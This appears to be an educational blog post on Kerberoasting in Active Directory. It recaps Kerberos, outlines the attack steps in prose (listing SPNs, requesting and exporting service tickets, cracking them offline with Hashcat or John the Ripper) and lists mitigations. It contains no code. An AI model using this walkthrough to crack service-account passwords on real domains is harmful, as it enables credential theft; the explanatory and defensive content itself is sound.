Status: Decrypted / 9/6/2025

Deep Dive: Kerberoasting Attacks

Understanding Kerberos and Kerberoasting

Introduction

Kerberos is the backbone of authentication in Active Directory environments. While robust, its design can be leveraged by skilled attackers. Kerberoasting is one such attack, targeting service accounts to extract their passwords offline. Understanding the full attack chain is critical for securing an AD environment.

1️⃣ Quick Recap of Kerberos

Kerberos relies on a Key Distribution Center (KDC) which handles two critical elements:

  • Ticket Granting Ticket (TGT): proves the user is authenticated to the domain.
  • Service Ticket (TGS): grants access to a specific service.

Typical authentication flow:

  1. User authenticates to the KDC → receives a TGT encrypted with their key.
  2. To access a service, the user requests a TGS from the KDC, presenting the TGT.
  3. The service verifies the TGS and grants access if valid.

2️⃣ Kerberoasting Explained in Depth

Principle

An Active Directory user can request a service ticket for any service from the KDC. The KDC does not check the requester’s permissions; its role is only to provide the security information related to the user (via the PAC).

This means it is possible to request service tickets specifying arbitrary SPNs. If these SPNs are registered in AD, the KDC returns information encrypted with the secret key of the service account. The attacker can then attempt to recover the clear-text password offline.

The Step-by-Step Attack Process

Step 1: Reconnaissance and Targeting

The attacker queries Active Directory to list all Service Principal Names (SPNs). Each SPN corresponds to a service account tied to a service (SQL, Exchange, etc.).

  • Tools: ldapsearch, PowerShell Get-ADUser.

Step 2: Requesting Service Tickets

The attacker requests a TGS for each targeted SPN. The KDC responds with a ticket encrypted with the service account’s NTLM hash.

Step 3: Exporting Tickets

Tickets are exported in readable formats (.kirbi or Base64). This is key: the attack happens completely offline, leaving no domain-side alerts.

Step 4: Offline Cracking

The attacker extracts the hash and runs brute-force or dictionary attacks (e.g., using Hashcat or John the Ripper).

3️⃣ Advanced Mitigations

To reduce Kerberoasting risk:

  1. Strong Passwords: Use long, complex, unique passwords for service accounts.
  2. gMSA: Use Group Managed Service Accounts (gMSA) where Windows manages long, random passwords.
  3. Least Privilege: Never grant Domain Admin rights to service accounts.
  4. Monitoring: Alert on mass TGS requests (Event ID 4769).

4️⃣ References